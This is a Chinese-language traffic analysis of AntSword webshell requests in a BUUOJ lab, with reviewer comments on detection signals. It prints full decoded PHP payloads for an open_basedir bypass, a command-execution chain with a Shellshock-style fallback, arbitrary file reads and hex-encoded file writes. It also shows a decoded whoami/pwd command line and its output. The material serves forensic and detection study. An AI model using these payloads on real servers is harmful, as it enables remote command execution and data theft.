蚁剑流量分析
默认编码
测试链接
请求数据包
POST /upload/ph.php HTTP/1.1
Host: bb2bcf4f-5508-49dd-a50a-2b8d2a925a86.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 1785
Connection: keep-alive
a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.aa92ba732e%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%220bf%22.%22295%22%3Becho%20%40asenc(%24output)%3Becho%20%2228%22.%22686%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
请求数据
// AntSword default PHP payload (default encoder), decoded from the URL-encoded
// `a=` body of the request above. The same prelude, asenc()/asoutput() pair
// and ob_start()/try/asoutput()/die() frame appear in every request on this page.
// NOTE(review): the decoded listing as rendered lost some whitespace and
// backslashes ("functionasoutput", "return$out", "echo"0bf""); the
// URL-encoded request body is the byte-accurate reference.
a=@ini_set("display_errors", "0");
// No execution time limit for the injected script.
@set_time_limit(0);
// --- Prelude: if open_basedir is configured, try to widen it to "/" before
// the real work. ---
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
// "Lzt8Oi8=" is base64 for the regex "/;|:/": split the open_basedir value on
// either path-list separator.
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
// Also try the script's own directory and the system temp dir.
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
// Forensic artifact: a hidden directory with a random hex name is created
// inside the first writable candidate (and removed again below).
$tmdir=$item."/.aa92ba732e";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
// Restrict open_basedir to "..", then chdir("..") once per path component of
// $tmdir so the cwd ends at the filesystem root.
@ini_set("open_basedir", "..");
// Rendered form dropped backslashes; the encoded body has /\\\\|\//, i.e.
// split on "\" or "/".
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
// Reset open_basedir to "/" and clean up the temp directory.
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
// Default encoder: the response body is returned unmodified.
function asenc($out) {
return$out;
}
;
// Flushes the output buffer framed by two marker strings. Each marker is split
// into two concatenated literals ("0bf"."295", "28"."686"); the response below
// shows the joined values 0bf295 ... 28686, presumably what the client uses to
// delimit the real output. Detection signal: every AntSword response on this
// page starts and ends with such a pair of short hex strings.
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"0bf"."295";
echo @asenc($output);
echo"28"."686";
}
ob_start();
try {
// Script directory (fallback: PATH_TRANSLATED), followed by a tab
// (%09 in the encoded body; rendered here as a space).
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D} ";
// Windows (no leading "/"): append every drive letter C: .. Z: that exists;
// otherwise just "/". The response below shows "/" for this Linux host.
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
} else {
$R.="/";
}
$R.=" ";
// Effective user name via posix_getpwuid() when the posix extension is
// loaded, else get_current_user(); the response shows "www-data".
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
// Kernel/OS string, then the user name, all tab-separated.
$R.=php_uname();
$R.=" {$s}";
echo$R;
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
a 为 webshell 的连接密码,整段 PHP 代码作为该参数的值提交。
@ini_set("display_errors", "0");,表示禁止显示 PHP 错误信息。
@set_time_limit(0);,脚本执行的时间不受限制。
输出函数
// Output wrapper (repeated from the payload above): flush the buffer and frame
// it with the two markers 0bf295 / 28686 seen in the response below.
// NOTE(review): "functionasoutput" is a rendering artifact for "function asoutput".
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"0bf"."295";
echo @asenc($output);
echo"28"."686";
}
返回包
0bf295
/var/www/html/upload/
Linux out 5.15.0-119-generic #129-Ubuntu SMP Fri Aug 2 19:25:20 UTC 2024 x86_64 www-data
28686
命令执行请求包
POST /upload/ph.php HTTP/1.1
Host: bb2bcf4f-5508-49dd-a50a-2b8d2a925a86.node5.buuoj.cn:81
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 4909
Connection: keep-alive
a=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.8fd860a%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22687%22.%222a9%22%3Becho%20%40asenc(%24output)%3Becho%20%2223%22.%2258b%22%3B%7Dob_start()%3Btry%7B%24p%3Dbase64_decode(substr(%24_POST%5B%22kb78d3bfb243d8%22%5D%2C2))%3B%24s%3Dbase64_decode(substr(%24_POST%5B%22h21304b547e841%22%5D%2C2))%3B%24envstr%3D%40base64_decode(substr(%24_POST%5B%22z18fc7fc8837b7%22%5D%2C2))%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24c%3Dsubstr(%24d%2C0%2C1)%3D%3D%22%2F%22%3F%22-c%20%5C%22%7B%24s%7D%5C%22%22%3A%22%2Fc%20%5C%22%7B%24s%7D%5C%22%22%3Bif(substr(%24d%2C0%2C1)%3D%3D%22%2F%22)%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3A%2Fusr%2Flocal%2Fsbin%3A%2Fusr%2Flocal%2Fbin%3A%2Fusr%2Fsbin%3A%2Fusr%2Fbin%3A%2Fsbin%3A%2Fbin%22)%3B%7Delse%7B%40putenv(%22PATH%3D%22.getenv(%22PATH%22).%22%3BC%3A%2FWindows%2Fsystem32%3BC%3A%2FWindows%2FSysWOW64%3BC%3A%2FWindows%3BC%3A%2FWindows%2FSystem32%2FWindowsPowerShell%2Fv1.0%2F%3B%22)%3B%7Dif(!empty(%24envstr))%7B%24envarr%3Dexplode(%22%7C%7C%7Casline%7C%7C%7C%22%2C%20%24envstr)%3Bforeach(%24envarr%20as%20%24v)
%20%7Bif%20(!empty(%24v))%20%7B%40putenv(str_replace(%22%7C%7C%7Caskey%7C%7C%7C%22%2C%20%22%3D%22%2C%20%24v))%3B%7D%7D%7D%24r%3D%22%7B%24p%7D%20%7B%24c%7D%22%3Bfunction%20fe(%24f)%7B%24d%3Dexplode(%22%2C%22%2C%40ini_get(%22disable_functions%22))%3Bif(empty(%24d))%7B%24d%3Darray()%3B%7Delse%7B%24d%3Darray_map('trim'%2Carray_map('strtolower'%2C%24d))%3B%7Dreturn(function_exists(%24f)%26%26is_callable(%24f)%26%26!in_array(%24f%2C%24d))%3B%7D%3Bfunction%20runshellshock(%24d%2C%20%24c)%20%7Bif%20(substr(%24d%2C%200%2C%201)%20%3D%3D%20%22%2F%22%20%26%26%20fe('putenv')%20%26%26%20(fe('error_log')%20%7C%7C%20fe('mail')))%20%7Bif%20(strstr(readlink(%22%2Fbin%2Fsh%22)%2C%20%22bash%22)%20!%3D%20FALSE)%20%7B%24tmp%20%3D%20tempnam(sys_get_temp_dir()%2C%20'as')%3Bputenv(%22PHP_LOL%3D()%20%7B%20x%3B%20%7D%3B%20%24c%20%3E%24tmp%202%3E%261%22)%3Bif%20(fe('error_log'))%20%7Berror_log(%22a%22%2C%201)%3B%7D%20else%20%7Bmail(%22a%40127.0.0.1%22%2C%20%22%22%2C%20%22%22%2C%20%22-bv%22)%3B%7D%7D%20else%20%7Breturn%20False%3B%7D%24output%20%3D%20%40file_get_contents(%24tmp)%3B%40unlink(%24tmp)%3Bif%20(%24output%20!%3D%20%22%22)%20%7Bprint(%24output)%3Breturn%20True%3B%7D%7Dreturn%20False%3B%7D%3Bfunction%20runcmd(%24c)%7B%24ret%3D0%3B%24d%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(fe('system'))%7B%40system(%24c%2C%24ret)%3B%7Delseif(fe('passthru'))%7B%40passthru(%24c%2C%24ret)%3B%7Delseif(fe('shell_exec'))%7Bprint(%40shell_exec(%24c))%3B%7Delseif(fe('exec'))%7B%40exec(%24c%2C%24o%2C%24ret)%3Bprint(join(%22%0A%22%2C%24o))%3B%7Delseif(fe('popen'))%7B%24fp%3D%40popen(%24c%2C'r')%3Bwhile(!%40feof(%24fp))%7Bprint(%40fgets(%24fp%2C2048))%3B%7D%40pclose(%24fp)%3B%7Delseif(fe('proc_open'))%7B%24p%20%3D%20%40proc_open(%24c%2C%20array(1%20%3D%3E%20array('pipe'%2C%20'w')%2C%202%20%3D%3E%20array('pipe'%2C%20'w'))%2C%20%24io)%3Bwhile(!%40feof(%24io%5B1%5D))%7Bprint(%40fgets(%24io%5B1%5D%2C2048))%3B%7Dwhile(!%40feof(%24io%5B2%5D))%7Bprint(%40fgets(%24io%5B2%5D%2C2048))%3B%7D%40fclose(%24io%5B1
%5D)%3B%40fclose(%24io%5B2%5D)%3B%40proc_close(%24p)%3B%7Delseif(fe('antsystem'))%7B%40antsystem(%24c)%3B%7Delseif(runshellshock(%24d%2C%20%24c))%20%7Breturn%20%24ret%3B%7Delseif(substr(%24d%2C0%2C1)!%3D%22%2F%22%20%26%26%20%40class_exists(%22COM%22))%7B%24w%3Dnew%20COM('WScript.shell')%3B%24e%3D%24w-%3Eexec(%24c)%3B%24so%3D%24e-%3EStdOut()%3B%24ret.%3D%24so-%3EReadAll()%3B%24se%3D%24e-%3EStdErr()%3B%24ret.%3D%24se-%3EReadAll()%3Bprint(%24ret)%3B%7Delse%7B%24ret%20%3D%20127%3B%7Dreturn%20%24ret%3B%7D%3B%24ret%3D%40runcmd(%24r.%22%202%3E%261%22)%3Bprint%20(%24ret!%3D0)%3F%22ret%3D%7B%24ret%7D%22%3A%22%22%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B&h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx&kb78d3bfb243d8=gUL2Jpbi9zaA%3D%3D&z18fc7fc8837b7=4S
请求包中除 a 之外还存在三个参数
// AntSword command-execution payload, decoded from the `a=` body of the request
// above. Prelude and output framing are the same as in the test-connection
// request; only the marker strings, the temp-dir name and the try-block differ.
// NOTE(review): the rendered listing lost whitespace and backslashes
// ("functionasoutput", "return$out", the \" around {$s} on the $c line); the
// URL-encoded request body is the byte-accurate reference.
a=@ini_set("display_errors", "0");
@set_time_limit(0);
// --- open_basedir prelude (see the first request for a line-by-line walk) ---
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
// "Lzt8Oi8=" = base64("/;|:/")
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
// Random hidden directory name differs per request (.8fd860a here).
$tmdir=$item."/.8fd860a";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
// Default encoder: identity.
function asenc($out) {
return$out;
}
;
// Response framing: 6872a9 ... 2358b (see the response packet below).
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
}
ob_start();
try {
// The three extra POST parameters carry two junk characters before the
// base64 text (e.g. "gU" in kb78d3bfb243d8); substr(...,2) drops them.
// $p = shell binary (/bin/sh), $s = command string, $envstr = extra
// environment (empty in this request: "4S" -> "").
$p=base64_decode(substr($_POST["kb78d3bfb243d8"],2));
$s=base64_decode(substr($_POST["h21304b547e841"],2));
$envstr=@base64_decode(substr($_POST["z18fc7fc8837b7"],2));
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
// Unix ($d starts with "/"): -c "<command>"; Windows: /c "<command>".
$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";
// Extend PATH with the usual system bin directories for the platform.
if(substr($d,0,1)=="/") {
@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
// Optional extra env vars, delimited by the literal tokens "|||asline|||"
// (between entries) and "|||askey|||" (between key and value) - both are
// usable as detection strings.
if(!empty($envstr)) {
$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
// Full command line, e.g. /bin/sh -c "<command>".
$r="{$p} {$c}";
// fe(): true when $f exists, is callable and is not listed in
// disable_functions (entries compared lowercased and trimmed).
function fe($f) {
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)) {
$d=array();
} else {
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
}
;
// Fallback used when every direct exec primitive is disabled: on a Unix host
// whose /bin/sh is bash, an environment variable holding a bash function
// definition followed by the command is set, then error_log()/mail() is
// called (presumably to spawn a child process through the shell so the
// appended command runs and its output lands in $tmp). Forensic indicators:
// env var name PHP_LOL and a temp file with prefix "as" in the temp dir.
function runshellshock($d, $c) {
if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {
if (strstr(readlink("/bin/sh"), "bash") != FALSE) {
$tmp = tempnam(sys_get_temp_dir(), 'as');
putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
if (fe('error_log')) {
error_log("a", 1);
} else {
// Rendered as "[email protected]"; the encoded body has a@127.0.0.1.
mail("[email protected]", "", "", "-bv");
}
} else {
return False;
}
$output = @file_get_contents($tmp);
@unlink($tmp);
if ($output != "") {
print($output);
return True;
}
}
return False;
}
;
// Tries the execution primitives in order - system, passthru, shell_exec,
// exec, popen, proc_open, antsystem, the runshellshock() fallback, and on
// Windows COM WScript.shell - and returns the exit status (127 if none is
// usable). Defender note: disabling a single function only moves the
// payload to the next branch; the whole chain has to be covered.
function runcmd($c) {
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')) {
@system($c,$ret);
} elseif(fe('passthru')) {
@passthru($c,$ret);
} elseif(fe('shell_exec')) {
print(@shell_exec($c));
} elseif(fe('exec')) {
@exec($c,$o,$ret);
// join("\n",$o) in the encoded body; the newline literal is rendered as a
// line break here.
print(join("
",$o));
} elseif(fe('popen')) {
$fp=@popen($c,'r');
while(!@feof($fp)) {
print(@fgets($fp,2048));
}
@pclose($fp);
} elseif(fe('proc_open')) {
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])) {
print(@fgets($io[1],2048));
}
while(!@feof($io[2])) {
print(@fgets($io[2],2048));
}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);
// antsystem is not a PHP builtin; presumably supplied by a helper
// extension - cannot tell from here.
} elseif(fe('antsystem')) {
@antsystem($c);
} elseif(runshellshock($d, $c)) {
return$ret;
} elseif(substr($d,0,1)!="/" && @class_exists("COM")) {
$w=new COM('WScript.shell');
$e=$w->exec($c);
$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);
} else {
$ret = 127;
}
return$ret;
}
;
// stderr is merged into stdout; the "can't cd" line in the response below is
// the shell's error text arriving through this redirection.
$ret=@runcmd($r." 2>&1");
// Non-zero exit status is appended as "ret=N".
print ($ret!=0)?"ret={$ret}":"";
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx
kb78d3bfb243d8=gUL2Jpbi9zaA==
z18fc7fc8837b7=4S
参数名1:h21304b547e841
参数名2:kb78d3bfb243d8
参数名3:z18fc7fc8837b7
两个输出函数
// Default encoder: returns the buffered output unchanged.
function asenc($out) {
return$out;
}
;
// Flushes the buffer framed by the markers 6872a9 / 2358b, which are the
// first and last lines of the response packet below.
// NOTE(review): "functionasoutput" is a rendering artifact for "function asoutput".
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
}
处理请求参数:通过字符串截取函数取得参数值第二个字符之后的数据,然后进行 base64 解码。
// Each value carries two junk characters before the base64 text ("gU" in
// kb78d3bfb243d8, "vX" in h21304b547e841); substr(...,2) drops them.
$p=base64_decode(substr($_POST["kb78d3bfb243d8"],2)); // -> /bin/sh
$s=base64_decode(substr($_POST["h21304b547e841"],2)); // -> the command string
解密前:
h21304b547e841=vXY2QgIi92YXIvd3d3L2h0bWwvdnVsL3Vuc2FmZXVwbG9hZC91cGxvYWRzIjt3aG9hbWk7ZWNobyA4NmNlZjgzNTRkMTtwd2Q7ZWNobyA1NzhkMWRhZjEx
解密后:
h21304b547e841=cd "/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11
解密前:
kb78d3bfb243d8=gUL2Jpbi9zaA==
解密后:
kb78d3bfb243d8=/bin/sh
base64 解密参数值后,针对两个参数值进行处理。
// Unix ($d starts with "/"): $c = -c "<command>"; Windows: /c "<command>".
// NOTE(review): the rendered line lost the backslashes escaping the inner
// quotes; the encoded body has \"{$s}\".
$c=substr($d,0,1)=="/"?"-c "{$s}"":"/c "{$s}"";
// Full command line: "<shell> -c "<command>"".
$r="{$p} {$c}";
$p=/bin/sh
$s=cd "/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11
$c=-c "cd "/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11"
$r=/bin/sh -c "cd "/var/www/html/vul/unsafeupload/uploads";whoami;echo 86cef8354d1;pwd;echo 578d1daf11"
将拼接好的 $r 传给 runcmd 函数。
// stderr is merged into stdout before the command line reaches runcmd(); the
// response below shows the shell's "can't cd" error inline as a result.
$ret=@runcmd($r." 2>&1");
runcmd 函数内部依次尝试多个 PHP 命令执行函数,每个函数调用前先用 fe() 检查其存在且未被 disable_functions 禁用,只要有一个可用就会执行命令。
function runcmd($c) {
$ret=0;
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')) {
@system($c,$ret);
} elseif(fe('passthru')) {
@passthru($c,$ret);
} elseif(fe('shell_exec')) {
print(@shell_exec($c));
} elseif(fe('exec')) {
@exec($c,$o,$ret);
print(join("
",$o));
输出函数
// Body of asoutput(): the buffered command output is framed by 6872a9 and
// 2358b, exactly as in the response packet below.
$output=ob_get_contents();
ob_end_clean();
echo"687"."2a9";
echo @asenc($output);
echo"23"."58b";
返回包
6872a9
/bin/sh: 1: cd: can't cd to /var/www/html/vul/unsafeupload/uploads
www-data
86cef8354d1
/var/www/html/upload
578d1daf11
2358b
下载文件请求包
请求包
// AntSword file-download (read) payload. Prelude and output framing are the
// same as in the earlier requests; only the temp-dir name, the markers and the
// try-block differ.
// NOTE(review): rendering artifacts as in the listings above
// ("functionasoutput", "return$out", "echo"e8f"").
a=@ini_set("display_errors", "0");
@set_time_limit(0);
// --- open_basedir prelude (see the first request for a line-by-line walk) ---
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
// "Lzt8Oi8=" = base64("/;|:/")
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
// Random hidden directory name for this request.
$tmdir=$item."/.b2940a35b";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
// Default encoder: identity.
function asenc($out) {
return$out;
}
;
// Response framing for this request: e8ffaf ... 6ac37.
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"e8f"."faf";
echo @asenc($output);
echo"6a"."c37";
}
ob_start();
try {
// Target path: POST j0db5c5abab4a1, un-escaped via stripslashes() when
// magic_quotes_gpc is on, first two junk characters dropped, then
// base64-decoded. For the request below this is an absolute path under
// /var/www/html/vul/unsafeupload/uploads/.
$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["j0db5c5abab4a1"]):$_POST["j0db5c5abab4a1"],2));
// Readability probe: open for reading and fetch one character; on success
// close the handle and stream the whole file into the output buffer.
$fp=@fopen($F,"r");
if(@fgetc($fp)) {
@fclose($fp);
@readfile($F);
} else {
echo("ERROR:// Can Not Read");
}
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
j0db5c5abab4a1=cIL3Zhci93d3cvaHRtbC92dWwvdW5zYWZldXBsb2FkL3VwbG9hZHMvcGgucGhw
接收参数
stripslashes:删除由 addslashes() 函数添加的反斜杠。
get_magic_quotes_gpc:判断 PHP 的 magic_quotes_gpc 选项是否开启;该选项开启时,PHP 会对 POST、GET、Cookie 提交的数据自动添加转义字符“\”,以避免特殊字符(尤其是在数据库语句中)引发错误。
substr:截取字符串。
base64_decode:base64 解码
// Path to read: strip magic-quotes escaping if enabled, drop the two junk
// prefix characters ("cI" in the request below), then base64-decode.
$F=base64_decode(substr(get_magic_quotes_gpc()?stripslashes($_POST["j0db5c5abab4a1"]):$_POST["j0db5c5abab4a1"],2));
解码之后的数据为下载文件的绝对路径
/var/www/html/vul/unsafeupload/uploads/ph.php
下载文件
fopen:fopen() 函数打开一个文件或 URL。
fgetc:fgetc() 函数从打开的文件中返回一个单一的字符。
readfile() 函数读取一个文件,并写入到输出缓冲。
// Probe readability with a single fgetc(); if it succeeds the file is sent
// verbatim with readfile(), otherwise a fixed error string is returned.
$fp=@fopen($F,"r");
if(@fgetc($fp)) {
@fclose($fp);
@readfile($F);
} else {
echo("ERROR:// Can Not Read");
}
上传文件请求包
请求包
// AntSword file-upload (write) payload. Prelude and output framing are the
// same as in the earlier requests; only the temp-dir name, the markers and the
// try-block differ.
// NOTE(review): rendering artifacts as in the listings above
// ("functionasoutput", "return$out", "echo"9f8384""); the str_replace
// arguments "r"/"n" also look like "\r"/"\n" with the backslash dropped -
// cannot be confirmed here since this request's encoded body is not shown.
a=@ini_set("display_errors", "0");
@set_time_limit(0);
// --- open_basedir prelude (see the first request for a line-by-line walk) ---
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
// "Lzt8Oi8=" = base64("/;|:/")
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
// Random hidden directory name for this request.
$tmdir=$item."/.2c21113";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
// Default encoder: identity.
function asenc($out) {
return$out;
}
;
// Response framing for this request: 9f83842a32f4 ... db8ba9344520.
functionasoutput() {
$output=ob_get_contents();
ob_end_clean();
echo"9f8384"."2a32f4";
echo @asenc($output);
echo"db8ba9"."344520";
}
ob_start();
try {
// Destination path: POST yeedbdd3ffe99 minus two junk prefix characters,
// base64-decoded (/var/www/html/upload/file.txt in the request below).
$f=base64_decode(substr($_POST["yeedbdd3ffe99"],2));
// File content: POST bbb651ffd32e89 as a plain hex string (the request
// below is hex only, so the two str_replace() calls remove nothing here).
$c=$_POST["bbb651ffd32e89"];
$c=str_replace("r","",$c);
$c=str_replace("n","",$c);
// Hex -> bytes: every two characters become "%XX" and go through urldecode().
$buf="";
for ($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));
// Append to the target (mode "a") and answer "1" on success, "0" otherwise.
// Detection signal: a POST with a long hex-only parameter that results in a
// new or grown file under the web root.
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");
;
}
catch(Exception $e) {
echo"ERROR://".$e->getMessage();
}
;
asoutput();
die();
